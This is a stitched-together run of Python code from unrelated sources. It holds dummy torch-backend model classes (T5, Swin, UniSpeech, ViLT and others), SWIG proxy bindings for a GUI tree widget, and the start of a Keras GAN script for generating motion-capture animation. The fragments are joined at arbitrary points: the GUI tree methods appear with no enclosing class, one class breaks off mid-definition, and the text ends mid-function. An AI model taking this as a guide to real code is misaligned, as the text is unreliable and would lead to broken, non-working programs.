requires_backends(self, ["torch"])
class SqueezeBertPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
SWIN_PRETRAINED_MODEL_ARCHIVE_LIST = None
class SwinForImageClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SwinModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class SwinPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
T5_PRETRAINED_MODEL_ARCHIVE_LIST = None
class T5EncoderModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class T5ForConditionalGeneration(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class T5Model(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class T5PreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
def load_tf_weights_in_t5(*args, **kwargs):
requires_backends(load_tf_weights_in_t5, ["torch"])
TRANSFO_XL_PRETRAINED_MODEL_ARCHIVE_LIST = None
class AdaptiveEmbedding(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class TransfoXLForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class TransfoXLLMHeadModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class TransfoXLModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class TransfoXLPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
def load_tf_weights_in_transfo_xl(*args, **kwargs):
requires_backends(load_tf_weights_in_transfo_xl, ["torch"])
TROCR_PRETRAINED_MODEL_ARCHIVE_LIST = None
class TrOCRForCausalLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class TrOCRPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
UNISPEECH_PRETRAINED_MODEL_ARCHIVE_LIST = None
class UniSpeechForCTC(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechForPreTraining(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
UNISPEECH_SAT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class UniSpeechSatForAudioFrameClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechSatForCTC(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechSatForPreTraining(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechSatForSequenceClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechSatForXVector(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechSatModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class UniSpeechSatPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
VILT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class ViltForImageAndTextRetrieval(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ViltForImagesAndTextClassification(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ViltForMaskedLM(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ViltForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ViltLayer(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ViltModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class ViltPreTrainedModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class VisionEncoderDecoderModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class VisionTextDualEncoderModel(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
VISUAL_BERT_PRETRAINED_MODEL_ARCHIVE_LIST = None
class VisualBertForMultipleChoice(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class VisualBertForPreTraining(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
class VisualBertForQuestionAnswering(metaclass=DummyObject):
_backends = ["torch"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["torch"])
def set_line_height(self, height):
return _gui.GuiTree_set_line_height(self, height)
def refresh(self):
return _gui.GuiTree_refresh(self)
def show(self):
return _gui.GuiTree_show(self)
def draw(self, dc):
return _gui.GuiTree_draw(self, dc)
def set_size(self, x, y, w, h):
return _gui.GuiTree_set_size(self, x, y, w, h)
def resize(self, x, y, w, h):
return _gui.GuiTree_resize(self, x, y, w, h)
def process_event(self, event_id):
return _gui.GuiTree_process_event(self, event_id)
def is_active(self):
return _gui.GuiTree_is_active(self)
def get_last_event_item(self):
return _gui.GuiTree_get_last_event_item(self)
def get_drag_over_item(self):
return _gui.GuiTree_get_drag_over_item(self)
def on_vscroll(self, sender, event, data):
return _gui.GuiTree_on_vscroll(self, sender, event, data)
def get_background_color(self):
return _gui.GuiTree_get_background_color(self)
def set_background_color(self, *args):
return _gui.GuiTree_set_background_color(self, *args)
def set_border_style(self, style):
return _gui.GuiTree_set_border_style(self, style)
def get_border_style(self):
return _gui.GuiTree_get_border_style(self)
def get_border_color(self):
return _gui.GuiTree_get_border_color(self)
def set_border_color(self, *args):
return _gui.GuiTree_set_border_color(self, *args)
def set_shaded_entries(self, flag):
return _gui.GuiTree_set_shaded_entries(self, flag)
def is_shaded_entries(self):
return _gui.GuiTree_is_shaded_entries(self)
def enable_drag_and_drop(self, flag, enable_first=True, enable_last=True):
return _gui.GuiTree_enable_drag_and_drop(self, flag, enable_first, enable_last)
def is_drag_and_drop_enabled(self):
return _gui.GuiTree_is_drag_and_drop_enabled(self)
def enable_item_delete(self, flag):
return _gui.GuiTree_enable_item_delete(self, flag)
def is_item_delete_enabled(self):
return _gui.GuiTree_is_item_delete_enabled(self)
def enable_multi_selection(self, flag):
return _gui.GuiTree_enable_multi_selection(self, flag)
def is_multi_selection_enabled(self):
return _gui.GuiTree_is_multi_selection_enabled(self)
def destroy_selected_items(self):
return _gui.GuiTree_destroy_selected_items(self)
def get_selection(self):
return _gui.GuiTree_get_selection(self)
def set_selection(self, new_selection, raise_event=False):
return _gui.GuiTree_set_selection(self, new_selection, raise_event)
def get_preselection(self):
return _gui.GuiTree_get_preselection(self)
def set_preselection(self, new_preselection):
return _gui.GuiTree_set_preselection(self, new_preselection)
def get_highlighted_items(self):
return _gui.GuiTree_get_highlighted_items(self)
def highlight_item(self, item, value):
return _gui.GuiTree_highlight_item(self, item, value)
def select_all(self):
return _gui.GuiTree_select_all(self)
def deselect_all(self, *args):
return _gui.GuiTree_deselect_all(self, *args)
def show_item(self, item):
return _gui.GuiTree_show_item(self, item)
def select_previous_item(self, item):
return _gui.GuiTree_select_previous_item(self, item)
def select_next_item(self, item):
return _gui.GuiTree_select_next_item(self, item)
def get_first_item(self):
return _gui.GuiTree_get_first_item(self)
def get_last_item(self, visible):
return _gui.GuiTree_get_last_item(self, visible)
def clear_preselection(self):
return _gui.GuiTree_clear_preselection(self)
def clear_highlighted_items(self):
return _gui.GuiTree_clear_highlighted_items(self)
def remove_all(self):
return _gui.GuiTree_remove_all(self)
if _newclass:
scroll_while_drag = staticmethod(_gui.GuiTree_scroll_while_drag)
else:
scroll_while_drag = _gui.GuiTree_scroll_while_drag
def on_item_activate(self, item):
return _gui.GuiTree_on_item_activate(self, item)
def get_icon_size(self):
return _gui.GuiTree_get_icon_size(self)
def set_icon_size(self, size):
return _gui.GuiTree_set_icon_size(self, size)
def preselect_item(self, item):
return _gui.GuiTree_preselect_item(self, item)
if _newclass:
class_info = staticmethod(_gui.GuiTree_class_info)
else:
class_info = _gui.GuiTree_class_info
if _newclass:
___class_destructor__ = staticmethod(_gui.GuiTree____class_destructor__)
else:
___class_destructor__ = _gui.GuiTree____class_destructor__
def get_class_info(self):
return _gui.GuiTree_get_class_info(self)
def __gui_destroy__(self):
return _gui.GuiTree___gui_destroy__(self)
def __collect__(self):
return _gui.GuiTree___collect__(self)
def __uncollect__(self):
return _gui.GuiTree___uncollect__(self)
def is_created_by_python(self):
if hasattr(self, '__pycreated__'):
return self.__pycreated__
else: return False
def destroy(self):
if self.is_created_by_python():
self.__disown__()
self.__gui_destroy__()
self.__uncollect__()
def __del__(self):
if not self.is_created_by_python(): return
if self.is_shown():
self.hide()
if self.is_destroyed():
if self.thisown: self.__disown__()
else: self.destroy()
def __disown__(self):
self.this.disown()
_gui.disown_GuiTree(self)
return weakref_proxy(self)
GuiTree_swigregister = _gui.GuiTree_swigregister
GuiTree_swigregister(GuiTree)
EVT_ID_TREE_ITEM_ACTIVATE = cvar.EVT_ID_TREE_ITEM_ACTIVATE
EVT_ID_TREE_ITEM_SELECT = cvar.EVT_ID_TREE_ITEM_SELECT
EVT_ID_TREE_ITEM_DESELECT = cvar.EVT_ID_TREE_ITEM_DESELECT
EVT_ID_TREE_ITEM_EXPAND = cvar.EVT_ID_TREE_ITEM_EXPAND
EVT_ID_TREE_ITEM_COLLAPSE = cvar.EVT_ID_TREE_ITEM_COLLAPSE
EVT_ID_TREE_SELECTION_CHANGED = cvar.EVT_ID_TREE_SELECTION_CHANGED
EVT_ID_TREE_SELECTION_REMOVE = cvar.EVT_ID_TREE_SELECTION_REMOVE
EVT_ID_TREE_SELECTION_DRAG = cvar.EVT_ID_TREE_SELECTION_DRAG
EVT_ID_TREE_SELECTION_DROP = cvar.EVT_ID_TREE_SELECTION_DROP
EVT_ID_TREE_ITEM_RENAME = cvar.EVT_ID_TREE_ITEM_RENAME
EVT_ID_TREE_NAVIGATE_UP = cvar.EVT_ID_TREE_NAVIGATE_UP
EVT_ID_TREE_NAVIGATE_DOWN = cvar.EVT_ID_TREE_NAVIGATE_DOWN
EVT_ID_TREE_NAVIGATE_LEFT = cvar.EVT_ID_TREE_NAVIGATE_LEFT
EVT_ID_TREE_NAVIGATE_RIGHT = cvar.EVT_ID_TREE_NAVIGATE_RIGHT
def GuiTree_scroll_while_drag(data):
return _gui.GuiTree_scroll_while_drag(data)
GuiTree_scroll_while_drag = _gui.GuiTree_scroll_while_drag
def GuiTree_class_info():
return _gui.GuiTree_class_info()
GuiTree_class_info = _gui.GuiTree_class_info
def GuiTree____class_destructor__(instance, is_array):
return _gui.GuiTree____class_destructor__(instance, is_array)
GuiTree____class_destructor__ = _gui.GuiTree____class_destructor__
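# The classes below are SWIG-generated proxies: each method forwards to the compiled _gui
# extension module, and the *_swigregister calls bind every proxy class to its C++ counterpart.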
class GuiTreeBasicArray(base.CoreBaseType):
__swig_setmethods__ = {}
for _s in [base.CoreBaseType]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, GuiTreeBasicArray, name, value)
__swig_getmethods__ = {}
for _s in [base.CoreBaseType]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, GuiTreeBasicArray, name)
__repr__ = _swig_repr
INVALID_INDEX = _gui.GuiTreeBasicArray_INVALID_INDEX
def __init__(self, *args):
this = _gui.new_GuiTreeBasicArray(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _gui.delete_GuiTreeBasicArray
__del__ = lambda self: None
def get_count(self):
return _gui.GuiTreeBasicArray_get_count(self)
def get_item(self, index):
return _gui.GuiTreeBasicArray_get_item(self, index)
def set_item(self, index, item):
return _gui.GuiTreeBasicArray_set_item(self, index, item)
def front(self):
return _gui.GuiTreeBasicArray_front(self)
def back(self):
return _gui.GuiTreeBasicArray_back(self)
def exists(self, item):
return _gui.GuiTreeBasicArray_exists(self, item)
def get_index(self, item):
return _gui.GuiTreeBasicArray_get_index(self, item)
def sub(self, index, count):
return _gui.GuiTreeBasicArray_sub(self, index, count)
def get_memory_size(self):
return _gui.GuiTreeBasicArray_get_memory_size(self)
def begin(self, *args):
return _gui.GuiTreeBasicArray_begin(self, *args)
def end(self, *args):
return _gui.GuiTreeBasicArray_end(self, *args)
def get_class_info(self):
return _gui.GuiTreeBasicArray_get_class_info(self)
if _newclass:
class_info = staticmethod(_gui.GuiTreeBasicArray_class_info)
else:
class_info = _gui.GuiTreeBasicArray_class_info
if _newclass:
___class_destructor__ = staticmethod(_gui.GuiTreeBasicArray____class_destructor__)
else:
___class_destructor__ = _gui.GuiTreeBasicArray____class_destructor__
def __setitem__(self, index, value):
return _gui.GuiTreeBasicArray___setitem__(self, index, value)
def __len__(self):
return _gui.GuiTreeBasicArray___len__(self)
def __getitem__(self, index):
if (index < self.get_count()):
return self.get_item(index)
else:
raise IndexError("The index (" + str(index) + ") is out of range")
def __nonzero__(self): return True
GuiTreeBasicArray_swigregister = _gui.GuiTreeBasicArray_swigregister
GuiTreeBasicArray_swigregister(GuiTreeBasicArray)
def GuiTreeBasicArray_class_info():
return _gui.GuiTreeBasicArray_class_info()
GuiTreeBasicArray_class_info = _gui.GuiTreeBasicArray_class_info
def GuiTreeBasicArray____class_destructor__(instance, is_array):
return _gui.GuiTreeBasicArray____class_destructor__(instance, is_array)
GuiTreeBasicArray____class_destructor__ = _gui.GuiTreeBasicArray____class_destructor__
class GuiTreeArray(GuiTreeBasicArray):
__swig_setmethods__ = {}
for _s in [GuiTreeBasicArray]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, GuiTreeArray, name, value)
__swig_getmethods__ = {}
for _s in [GuiTreeBasicArray]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, GuiTreeArray, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _gui.new_GuiTreeArray(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _gui.delete_GuiTreeArray
__del__ = lambda self: None
def append(self, *args):
return _gui.GuiTreeArray_append(self, *args)
def get_count(self):
return _gui.GuiTreeArray_get_count(self)
def remove_all(self):
return _gui.GuiTreeArray_remove_all(self)
def resize(self, *args):
return _gui.GuiTreeArray_resize(self, *args)
def copy_from(self, *args):
return _gui.GuiTreeArray_copy_from(self, *args)
def copy_to(self, dest):
return _gui.GuiTreeArray_copy_to(self, dest)
def get_list(self, list):
return _gui.GuiTreeArray_get_list(self, list)
def set_list(self, list):
return _gui.GuiTreeArray_set_list(self, list)
def get_memory_size(self):
return _gui.GuiTreeArray_get_memory_size(self)
def get_class_info(self):
return _gui.GuiTreeArray_get_class_info(self)
if _newclass:
class_info = staticmethod(_gui.GuiTreeArray_class_info)
else:
class_info = _gui.GuiTreeArray_class_info
if _newclass:
___class_destructor__ = staticmethod(_gui.GuiTreeArray____class_destructor__)
else:
___class_destructor__ = _gui.GuiTreeArray____class_destructor__
GuiTreeArray_swigregister = _gui.GuiTreeArray_swigregister
GuiTreeArray_swigregister(GuiTreeArray)
def GuiTreeArray_class_info():
return _gui.GuiTreeArray_class_info()
GuiTreeArray_class_info = _gui.GuiTreeArray_class_info
def GuiTreeArray____class_destructor__(instance, is_array):
return _gui.GuiTreeArray____class_destructor__(instance, is_array)
GuiTreeArray____class_destructor__ = _gui.GuiTreeArray____class_destructor__
class GuiTreeVector(GuiTreeBasicArray):
__swig_setmethods__ = {}
for _s in [GuiTreeBasicArray]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, GuiTreeVector, name, value)
__swig_getmethods__ = {}
for _s in [GuiTreeBasicArray]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, GuiTreeVector, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _gui.new_GuiTreeVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _gui.delete_GuiTreeVector
__del__ = lambda self: None
def append(self, *args):
return _gui.GuiTreeVector_append(self, *args)
def add(self, element):
return _gui.GuiTreeVector_add(self, element)
def insert(self, element, index):
return _gui.GuiTreeVector_insert(self, element, index)
def remove_last(self):
return _gui.GuiTreeVector_remove_last(self)
def empty(self):
return _gui.GuiTreeVector_empty(self)
def remove_all(self):
return _gui.GuiTreeVector_remove_all(self)
def clear(self, *args):
return _gui.GuiTreeVector_clear(self, *args)
def remove(self, *args):
return _gui.GuiTreeVector_remove(self, *args)
def is_empty(self):
return _gui.GuiTreeVector_is_empty(self)
def remove_item(self, item, preserve_order):
return _gui.GuiTreeVector_remove_item(self, item, preserve_order)
def remove_items(self, item):
return _gui.GuiTreeVector_remove_items(self, item)
def get_count(self):
return _gui.GuiTreeVector_get_count(self)
def get_capacity(self):
return _gui.GuiTreeVector_get_capacity(self)
def set_count(self, *args):
return _gui.GuiTreeVector_set_count(self, *args)
def set_capacity(self, *args):
return _gui.GuiTreeVector_set_capacity(self, *args)
def refit(self):
return _gui.GuiTreeVector_refit(self)
def swap(self, swap_v1, swap_v2):
return _gui.GuiTreeVector_swap(self, swap_v1, swap_v2)
def resize(self, *args):
return _gui.GuiTreeVector_resize(self, *args)
def reserve(self, *args):
return _gui.GuiTreeVector_reserve(self, *args)
def copy_from(self, *args):
return _gui.GuiTreeVector_copy_from(self, *args)
def copy_to(self, dest):
return _gui.GuiTreeVector_copy_to(self, dest)
def get_list(self, list):
return _gui.GuiTreeVector_get_list(self, list)
def set_list(self, list):
return _gui.GuiTreeVector_set_list(self, list)
def get_array(self, array):
return _gui.GuiTreeVector_get_array(self, array)
def set_array(self, array):
return _gui.GuiTreeVector_set_array(self, array)
def move(self, arg2, to):
return _gui.GuiTreeVector_move(self, arg2, to)
def item(self, index):
return _gui.GuiTreeVector_item(self, index)
def get_memory_size(self):
return _gui.GuiTreeVector_get_memory_size(self)
def get_class_info(self):
return _gui.GuiTreeVector_get_class_info(self)
if _newclass:
class_info = staticmethod(_gui.GuiTreeVector_class_info)
else:
class_info = _gui.GuiTreeVector_class_info
if _newclass:
___class_destructor__ = staticmethod(_gui.GuiTreeVector____class_destructor__)
else:
___class_destructor__ = _gui.GuiTreeVector____class_destructor__
GuiTreeVector_swigregister = _gui.GuiTreeVector_swigregister
GuiTreeVector_swigregister(GuiTreeVector)
def GuiTreeVector_class_info():
return _gui.GuiTreeVector_class_info()
GuiTreeVector_class_info = _gui.GuiTreeVector_class_info
def GuiTreeVector____class_destructor__(instance, is_array):
return _gui.GuiTreeVector____class_destructor__(instance, is_array)
GuiTreeVector____class_destructor__ = _gui.GuiTreeVector____class_destructor__
class GuiTreeSet(base.CoreBaseObject):
__swig_setmethods__ = {}
for _s in [base.CoreBaseObject]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, GuiTreeSet, name, value)
__swig_getmethods__ = {}
for _s in [base.CoreBaseObject]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, GuiTreeSet, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _gui.new_GuiTreeSet(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def get_count(self):
return _gui.GuiTreeSet_get_count(self)
def exists(self, *args):
return _gui.GuiTreeSet_exists(self, *args)
def is_empty(self):
return _gui.GuiTreeSet_is_empty(self)
def is_included(self, set):
return _gui.GuiTreeSet_is_included(self, set)
def get_items(self):
return _gui.GuiTreeSet_get_items(self)
def get_item(self, index):
return _gui.GuiTreeSet_get_item(self, index)
def back(self, *args):
return _gui.GuiTreeSet_back(self, *args)
def get_array(self, array):
return _gui.GuiTreeSet_get_array(self, array)
def get_list(self, list):
return _gui.GuiTreeSet_get_list(self, list)
def get_vector(self, vector):
return _gui.GuiTreeSet_get_vector(self, vector)
def to_array(self):
return _gui.GuiTreeSet_to_array(self)
def add(self, *args):
return _gui.GuiTreeSet_add(self, *args)
def remove(self, index):
return _gui.GuiTreeSet_remove(self, index)
def remove_item(self, item):
return _gui.GuiTreeSet_remove_item(self, item)
def remove_set(self, set):
return _gui.GuiTreeSet_remove_set(self, set)
def remove_all(self):
return _gui.GuiTreeSet_remove_all(self)
def toggle(self, item):
return _gui.GuiTreeSet_toggle(self, item)
def unite(self, set):
return _gui.GuiTreeSet_unite(self, set)
def intersect(self, set):
return _gui.GuiTreeSet_intersect(self, set)
def __eq__(self, set):
if not isinstance(set, type(self)):
return False
return _gui.GuiTreeSet___eq__(self, set)
def __ne__(self, set):
return _gui.GuiTreeSet___ne__(self, set)
def begin(self, *args):
return _gui.GuiTreeSet_begin(self, *args)
def end(self, *args):
return _gui.GuiTreeSet_end(self, *args)
if _newclass:
get_linear_search_threshold = staticmethod(_gui.GuiTreeSet_get_linear_search_threshold)
else:
get_linear_search_threshold = _gui.GuiTreeSet_get_linear_search_threshold
def get_memory_size(self):
return _gui.GuiTreeSet_get_memory_size(self)
def __setitem__(self, index, value):
return _gui.GuiTreeSet___setitem__(self, index, value)
def __len__(self):
return _gui.GuiTreeSet___len__(self)
def __getitem__(self, index):
if (index < self.get_count()):
return self.get_item(index)
else:
raise IndexError("The index (" + str(index) + ") is out of range")
def __nonzero__(self): return True
__swig_destroy__ = _gui.delete_GuiTreeSet
__del__ = lambda self: None
GuiTreeSet_swigregister = _gui.GuiTreeSet_swigregister
GuiTreeSet_swigregister(GuiTreeSet)
def GuiTreeSet_get_linear_search_threshold():
return _gui.GuiTreeSet_get_linear_search_threshold()
GuiTreeSet_get_linear_search_threshold = _gui.GuiTreeSet_get_linear_search_threshold
class GuiTreeItem(GuiWidget):
__swig_setmethods__ = {}
for _s in [GuiWidget]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, GuiTreeItem, name, value)
__swig_getmethods__ = {}
for _s in [GuiWidget]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, GuiTreeItem, name)
# Repository: EtienneFrigo/AnimGAN
#Loading Libraries
from __future__ import print_function
import argparse
import os
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
from PIL import Image
import math
import random
from keras.models import Sequential
from keras.layers import Dense, Reshape, Dropout, LSTM, Embedding, TimeDistributed, Bidirectional
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.core import Activation, Flatten
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import Conv2D, MaxPooling2D, UpSampling2D
from keras.optimizers import SGD, Adam, RMSprop
from keras.datasets import mnist
import BVH as BVH
import Animation as Animation
from Quaternions import Quaternions
from keras.utils.generic_utils import Progbar
#Parameters
RUN_ID = "1"
DIR = '/home/dl-box/lab/GANs/Movement_GAN/' #working directory
NUM_EPOCHS = 1000
BATCH_SIZE = 64
DURATION = 3 #seconds
FRAMERATE = 1/12 #should be 1 divided by a multiple of 12 (otherwise the pre-processing may run into problems)
NB_FRAMES = int(DURATION / FRAMERATE)
NOISE_SHAPE = (10,10) #shape of the noise used as input for the generator
NAMES = ['Hips', 'Chest', 'Chest2', 'Chest3', 'Chest4', 'Neck', 'Head', 'RightCollar', 'RightShoulder', 'RightElbow',
'RightWrist', 'LeftCollar', 'LeftShoulder', 'LeftElbow', 'LeftWrist', 'RightHip', 'RightKnee', 'RightAnkle',
'RightToe', 'LeftHip', 'LeftKnee', 'LeftAnkle', 'LeftToe'] #names of the 3Dmodel joints
NB_JOINTS = len(NAMES) #number of joints
# use specific GPU
GPU = "1"
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = GPU
#create the folder for the low-resolution data
if not os.path.exists("lowFPS_"+str(RUN_ID)+"_"+str(DURATION)+"s_"+str(1/FRAMERATE)+"fps"):
os.makedirs("lowFPS_"+str(RUN_ID)+"_"+str(DURATION)+"s_"+str(1/FRAMERATE)+"fps")
# create the folder to save the samples
if not os.path.exists("motion_samples_dir"+RUN_ID):
os.makedirs("motion_samples_dir"+RUN_ID)
# create the folder to save the predictions
if not os.path.exists("motion_pred_dir"+RUN_ID):
os.makedirs("motion_pred_dir"+RUN_ID)
def mirror_rotations(rotations):
"""give the mirror image of a rotation matrix (np array)"""
F = rotations.shape[0] #number of frames
J = rotations.shape[1] #number of joints
result = rotations.copy()
modif = np.array([1,1,-1,-1]) #to get the mirror image of Quaternions, you can reverse the last parameters (empirical)
for f in range(F):
for j in range(0,7):# mirror the spine and head
rotations[f][j] *= modif
#mirror Collars
temp = rotations[f][7]
result[f][7]=rotations[f][11]*modif
result[f][11]=temp*modif
#mirror Shoulders
temp = rotations[f][8]
result[f][8]=rotations[f][12]*modif
result[f][12]=temp*modif
#mirror Elbow
temp = rotations[f][9]
result[f][9]=rotations[f][13]*modif
result[f][13]=temp*modif
#mirror Wrists
temp = rotations[f][10]
result[f][10]=rotations[f][14]*modif
result[f][14]=temp*modif
#mirror Hips
temp = rotations[f][15]
result[f][15]=rotations[f][19]*modif
result[f][19]=temp*modif
#mirror Knees
temp = rotations[f][16]
result[f][16]=rotations[f][20]*modif
result[f][20]=temp*modif
#mirror Ankles
temp = rotations[f][17]
result[f][17]=rotations[f][21]*modif
result[f][21]=temp*modif
#mirror Toes
temp = rotations[f][18]
result[f][18]=rotations[f][22]*modif
result[f][22]=temp*modif
return result
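# A minimal usage sketch for mirror_rotations (an illustration, not part of the original script;
# it assumes a rotations array of shape (NB_FRAMES, NB_JOINTS, 4), i.e. one quaternion per joint per frame):
# example_rots = np.random.uniform(-1, 1, size=(NB_FRAMES, NB_JOINTS, 4))
# mirrored = mirror_rotations(example_rots)
# assert mirrored.shape == example_rots.shape  # left/right joints swapped, quaternion components mirrored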
def add_noise(rotations, level):
"""adds random noise to a rotation matrix np array. The noise will have a value in the range [-level ; level]"""
S = rotations.shape[0] #size of the array
F = rotations.shape[1] #number of frames
J = rotations.shape[2] #number of joints
result = rotations.copy()
for s in range(S):
for f in range(F):
for j in range(J):
for q in range(4):
result[s][f][j][q]+=np.random.uniform(-level,level)
return result
def make_animation(generated_rots, original_anim):
"""make a proper animation object from rotations by using a model from the real data for static parameters (orients, offsets ...) """
generated_anim = (Animation.Animation(Quaternions(generated_rots),
original_anim.positions,
original_anim.orients,
original_anim.offsets,
original_anim.parents
))
return generated_anim
def make_fake_list(nb_motions, nb_frames, nb_joints):
"""build a totally random motion"""
rots = np.array([[[[0.0]*4]*nb_joints]*nb_frames]*nb_motions)
for s in range (nb_motions):
for f in range(nb_frames):
for j in range(nb_joints):
for q in range (4):
rots[s][f][j][q] = np.random.uniform(-1,1)
return rots
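# Note: a vectorised NumPy equivalent of make_fake_list (a sketch, not the author's code) would be:
# rots = np.random.uniform(-1, 1, size=(nb_motions, nb_frames, nb_joints, 4))
# which builds the same uniformly random array in a single call instead of four nested loops.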
def make_odd(rots_data, oddity):
"""adds some unrealistic features to a rotations matrix data by modifying a random body part (spine, left arm ...).
These features can be parametrized. Oddity allows to choose in which manner they will be change:
- random : add noise an arm, a leg or the spine
- inverse : reverse the rotations
- static : set to default rotations"""
S = rots_data.shape[0] # number of elements in the data set
F = rots_data.shape[1] # number of frame per element
J = rots_data.shape[2] # number of joint per frame
result = rots_data.copy()
if oddity == 'random':
for s in range(S):
R = random.randint(0,4)
if R == 0:#spines
modif = [0,1,2,3,4,5]
if R == 1:#right arm
modif = [6,8,9,10]
if R == 2:#left arm
modif = [11,12,13,14]
if R == 3:#right leg
modif = [15,16,17,18]
if R == 4:#left leg
modif = [19,20,21,22]
for f in range(F):
for j in modif:
for q in range(4):
result[s][f][j][q]+=np.random.uniform(-0.3,0.3)
if oddity == 'inverse':
for s in range(S):
R = random.randint(0,4)
if R == 0:#spines
modif = [0,1,2,3,4,5]
if R == 1:#right arm
modif = [6,8,9,10]
if R == 2:#left arm
modif = [11,12,13,14]
if R == 3:#right leg
